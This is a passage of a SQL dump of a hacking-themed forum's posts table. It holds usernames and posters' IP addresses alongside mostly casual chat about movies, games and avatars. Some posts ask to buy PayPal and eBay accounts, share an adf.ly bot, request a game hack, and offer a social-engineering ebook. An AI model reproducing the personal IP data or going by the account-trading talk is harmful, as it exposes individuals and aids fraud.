`ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4722', '874', '0', '7', 'N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350268816', 'hey LH, did anyone see that smart little cookie who hacked N.A.S.A. the goverment are stupid there waiting for him to come out of his hiding place when they could be hiring him to do some good work with them.lol', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', '5f20760d76d0bf3ae2c526e50fd8f15e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4723', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '257', 'XxTREYZxX', '1350269021', '1. the dictator 2. super bad 3.zombie land', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'cdd260e65784ce42bd5ecc96581ee177', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4724', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '82', 'iTzIpod', '1350271565', '1. 21 Jump Street 2. Tranformers: Some Dark Moon shit 3. The Amazing Spiderman 3D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3030929e224231ec40a6ca3b47671902', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4725', '619', '4721', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350271825', '[quote=\'mothered\' pid=\'4721\' dateline=\'1350268747\'] I\'m terrible at graphics, and this guide will certainly be of great benefit. Thanking you :) [/quote] No problem! You\'re welcome. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f1e3c6293facc64948bc83581dc4daf2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4726', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '1', 't3h jok3r', '1350272664', 'Lol off course because you\'re my best friend online (No homo) and isn\'t Python hard to learn?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b8f0c347655916061a6810cf349a341f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4727', '861', '4711', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350272728', '[quote=\'mothered\' pid=\'4711\' dateline=\'1350267563\'] This Is certainly a great Idea Indeed. Nice that you\'ve stickied It too. [/quote] Thanks I also wanted to add sites that we need to beat but didn\'t release them because someone might DDoS them.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dcc6709cb56afccb729598ca8fe90310', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4728', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '1', 't3h jok3r', '1350272804', 'Lol NASA gets Hacked every 2nd month, no new thing.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b27e61e5258ab4e5e7ff9429eeca5f30', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4729', '868', '4710', '71', 'RE: whats the best COD', '0', '1', 't3h jok3r', '1350272854', 'I think Black OPs or MW3.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7757570cdc7e4f398730517e338746bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4730', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1350272915', 'LIARS!!!!!! If you all voted then why did the number only increase by 2 votes?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a102b4e0d08c339c2e2d5bb1cf2ac9ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4731', '496', '4619', '14', 'RE: Free Proxy List', '0', '1', 't3h jok3r', '1350272995', '[quote=\'iTzIpod\' pid=\'4619\' dateline=\'1350225059\'] t3h jok3r. Give me you Adf.ly bot. -.- I need money too you know? [/quote] Sure, I downloaded it from somewhere and got 4 bots but I only extracted and use one. I can send a download link to all of them if you want.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8f22fb090a1a733a289674555c86145b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4732', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '5', 'Timmy', '1350273992', 'There\'s action after 10-15 minutes everytime.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1b04e55de4584f9fea5e516374138023', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4733', '821', '4578', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '5', 'Timmy', '1350274047', '[quote=\'t3h jok3r\' pid=\'4578\' dateline=\'1350194065\'] Lol Greed. OT: I\'m thinking if I should drink water now or after I\'m done checking my emails. [/quote] This right here is the best answer on this thread.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4750343679631c5cc2ede5cb47bc4af8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4734', '496', '2408', '14', 'RE: Free Proxy List', '0', '5', 'Timmy', '1350274368', 'Nice list, long and all working.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '249170d45989e2f17eec39607f9d8ee4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4735', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '5', 'Timmy', '1350274398', 'This is the 8th time I saw NASA get hacked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'bd114e6f123a1cc3d9dcc5471562ba74', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4736', '871', '4715', '65', 'RE: What\'s Your Top 3 Movies?', '0', '5', 'Timmy', '1350274462', 'I\'m not really sure and can\'t remember but off the head I would say Fast and the Furious, Resident Evil and James Bond movies.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0ecd54d95705bb25bea631d9db5e81f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4737', '872', '4717', '24', 'RE: Windows Updates, who uses It?', '0', '5', 'Timmy', '1350274830', 'What exactly are your referring to?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7f27871d78b6d57d29a8ac419c161ad0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4738', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '5', 'Timmy', '1350274891', 'My thought it\'s a good website to communicate but misused a lot and a site for kids now. People now use texting, BBM and other instant messengers which totally dominated FB in my opinion. FB is a useless site but good for advertising.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9bb15db84b20bc86c5c4a519245c60ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4739', '875', '0', '3', 'New LH Avatars', '0', '1', 't3h jok3r', '1350275816', 'I have been working on a couple of new unique avatars for L33T Hacking and today I\'m finally done with it. Here is one of the Avatars, I will update and post the others later. I originally made this iTzIpod but he doesn\'t seem to like it so feel free to take it :D [img]http://l33thavatars.netne.net/avatar/[/img] Keep refreshing the page and look at the new images in one avatar. So basically everytime someone refreshes the page you have a new avatar but all the avatars are in one image. Rate the above avatar. 0-10 (0 sucks, 10 mind blowing) [b]Pack 1[/b] [spoiler] [img]http://l33thavatars.netne.net/avatar/[/img] [img]http://l33thavatars.netne.net/penguins[/img] [img]http://l33thavatars.netne.net/money/[/img] [img]http://l33thavatars.netne.net/animals/[/img] Hope you like them. Suggest more below. [/spoiler]', '72.231.24.165', '1223104677', '1', '0', '1', '1350336574', '1', '22f0d70ba62fb24b7857ce351a15eaad', '0', '1350336574'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4740', '875', '4739', '3', 'RE: New LH Avatars', '0', '222', 'Exposé', '1350275949', 'Why are they all of ipods or mp3 players?', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '39ccaf2c7bfeac80c10e14aab27c2115', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4741', '875', '4740', '3', 'RE: New LH Avatars', '0', '1', 't3h jok3r', '1350276047', '[quote=\'ƒ???????????g\' pid=\'4740\' dateline=\'1350275949\'] Why are they all of ipods or mp3 players? [/quote] As I said I made for iTzIpod so I made it related to his username and his interest, but others won\'t be only of Apple.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a8d1246666fccb876c71fcdd23582282', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4742', '876', '0', '7', 'Anyone have a paypal + ebay I can buy off you?', '0', '222', 'Exposé', '1350276079', 'I am in need of a paypal + ebay account that has decent rep. Not alot but pretty good. Willing to pay a good price for it...just tell me how much and we can arrange something :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9e91c6b34563ce26f1fabe9f4a6bd7ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4743', '875', '4739', '3', 'RE: New LH Avatars', '0', '222', 'Exposé', '1350276353', 'Wanna make me one :P...idk what would be in the avatar but yeh....:P', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'cf44e3cc70e4915818d89ee11411adf0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4744', '874', '4722', '7', 'RE: N.A.S.A HACKED', '0', '257', 'XxTREYZxX', '1350276589', 'i think they need to upgrade their security settings.', '203.104.11.2', '-882373886', '1', '0', '0', '0', '1', 'd93bf40c124b04b69c48c0a805ab0dac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4745', '868', '4710', '71', 'RE: whats the best COD', '0', '257', 'XxTREYZxX', '1350276928', 'same i think mw3 because its multiplayer is great or i\'m just good', '203.104.11.3', '-882373885', '1', '0', '0', '0', '1', 'f1459ed4531fbcd1997bb8b658561169', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4746', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '257', 'XxTREYZxX', '1350277191', 'yeah i\'v seen this movie its great i really like it. i\'m gonna download it for the collection.:)', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '57479bb2a241f65f9312e5d995b0823b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4747', '877', '0', '11', 'could some one teach how to hack facebook tetrisfreinds', '0', '257', 'XxTREYZxX', '1350278405', 'title says it all hopefully some knows how to.', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '0d944e3ec2ce1034ac92289f1679aa01', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4748', '878', '0', '16', 'ƒ???????????g\'s Dell SE Method....', '0', '222', 'Exposé', '1350283397', 'If anyone is interested in my Dell SE Method ebook that I made a while ago....you can pm me and I will give you the link....only sharing this with the first 5 members....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5b65250f5efdf7bdffb0d2d2b483be9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4749', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '257', 'XxTREYZxX', '1350288533', 'yeah im interested thanks man.', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'b374da7139743d55c30808eb74518700', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4750', '879', '0', '9', 'could some one teach how to make money on a site.', '0', '257', 'XxTREYZxX', '1350290641', 'hey lh, can some one teach me how to make money on the internet thank you,', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '2a31e798e8cfed504e15478b3765e7bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4751', '875', '4739', '3', 'RE: New LH Avatars', '0', '205', 'mothered', '1350298268', 'I don\'t see anything wrong with them. Looking forward to seeing the rest, when they\'re available.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5af63f2007e45d9f243dbabf27eb88cd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4752', '873', '4718', '7', 'RE: What do you think of Facebook?', '0', '205', 'mothered', '1350298529', 'I agree with the above, to have a laugh and post fake details. \"FB is a useless site but good for advertising\". Well said Timmy :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '078f3e6ea781a6bd51ddd66656afad2e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4753', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1350301059', 'I voted already. Looooool :D One of the votes are mine.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c13ed5ba783f1e574d22afc5ecefc1a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4754', '855', '4547', '74', 'RE: need a minecraft account (premium)', '0', '82', 'iTzIpod', '1350301085', 'I don\'t think we do MOTMs here. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b3ff55f3d90ba7b9e8edb514932acbbe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4755', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350301117', 'I use DarkMystic 3.3 And also BotQuestWorlds 1.8 :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abded0e4b8eb59aae6a7164f23a5b1bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4756', '867', '4709', '71', 'RE: Fifa 13', '0', '82', 'iTzIpod', '1350301150', 'I wanna play it. Looks fun. Never played a Fifa game before :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cdea07aa327b5ad14fd296de3e927680', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4757', '869', '4712', '74', 'RE: who loves counter strike', '0', '82', 'iTzIpod', '1350301177', 'I\'d prefer Combat Arms :3 I like it better than Counter Strike.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad7b5ad2bf46e6df8ed78356c9909a2c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4758', '875', '4739', '3', 'RE: New LH Avatars', '0', '82', 'iTzIpod', '1350301266', 'I didn\'t say I didn\'t like it or anything... -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37368b037f81d3340d3fcd14419fb88d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4759', '876', '4742', '7', 'RE: Anyone have a paypal + ebay I can buy off you?', '0', '82', 'iTzIpod', '1350301293', 'I know someone that owns a Paypal Account + eBay account with 1k+ rep?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4c235aecc1e1b43719608b900eba4013', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4760', '496', '2408', '14', 'RE: Free Proxy List', '0', '82', 'iTzIpod', '1350301340', 'Send me the one you use.. :D Thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'db29cab4f2d93ad491ef9dc50ce61c1c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4761', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350302177', 'Reloadzor -.- Where are you...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bb8eaab4992bb8adc80b02e364f509d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4762', '875', '4739', '3', 'RE: New LH Avatars', '0', '3', '??????????¢™', '1350310473', 'Damnn that is sick AF, I like how it changes everytime you refresh. Mind making me one?', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3a94188b56255acdc185125b67a3f974', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4763', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '100', '??zg???g????61', '1350315588', 'Awesome job so far ;D but we\'re only a little bit of the way up the mountain', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '351288e16ea86ec86ed2f616fb0743f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4764', '879', '4750', '9', 'RE: could some one teach how to make money on a site.', '0', '100', '??zg???g????61', '1350315834', 'This is an unnecessary thread... There are a bunch of methods already in this section...', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'a6a464d1219535aecdd24d0c58e82e13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4765', '880', '0', '9', '[eBook] How to make a fortune by playing Fifa ($65 eBook) [ONLY $3!]', '0', '100', '??zg???g????61', '1350316371', 'Hey everyone, I just came across a $65 eBook. Even better is that I got the version with resell rights! :D Yep so I know this is kinda cheep of me, but since its a $65 eBook with resell rights, I\'m going to sell it for $3. Post here if you want it and I\'ll PM you with further instructions. Thanks everyone!', '96.237.179.21', '1626190613', '1', '0', '100', '1350349214', '1', 'e3694b23da9e3722afcafd84a4ae734b', '0', '1350349214'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4766', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '53', 'sirchamp', '1350319227', 'Pretty nice what we have already reached. I think the biggest.problem is that when you searcch for this forum on google and click the first page, an error comes. //posting this in Austria with my ipad.sorry for all the mistakes', '91.112.114.162', '1534096034', '1', '0', '0', '0', '1', '3083e41af91d379a8c7fd762124d2d9d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4767', '880', '4765', '9', 'RE: [FREE] How to make a fortune by playing Fifa [LEAKED]', '0', '53', 'sirchamp', '1350319434', 'Why don\'t u resell it then?? Thanks a million for this :D', '91.112.114.162', '1534096034', '1', '0', '53', '1350319453', '1', '7217d7857c3464432dbfcb29681abfcf', '0', '1350319453'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4768', '880', '4765', '9', 'RE: [FREE] How to make a fortune by playing Fifa [LEAKED]', '0', '62', 'R?????zo?', '1350319936', 'Thanks for this bro, I will give it a look :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6b6e9cc052b5a6d011bca9f605a5d721', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4769', '875', '4739', '3', 'RE: New LH Avatars', '0', '62', 'R?????zo?', '1350321599', 'that\'s really cool that changes everytime you refresh :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '30024a00c1192aebd44873b390ac9c93', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4770', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '62', 'R?????zo?', '1350321704', 'Hmm I can give this a try, but I don\'t know what do add though :P well that\'s when I have free time, im short on time atm.', '94.132.244.168', '1585771688', '1', '0', '62', '1350321767', '1', '9da45be4986fc4696115c3759b1288db', '0', '1350321767'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4771', '496', '2408', '14', 'RE: Free Proxy List', '0', '62', 'R?????zo?', '1350321853', 'I\'d like that adf.ly bot too :P On topic: thanks for the list :)', '94.132.244.168', '1585771688', '1', '0', '62', '1350321868', '1', 'cf63c3afab8bb936b308fb038b362fd1', '0', '1350321868'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, 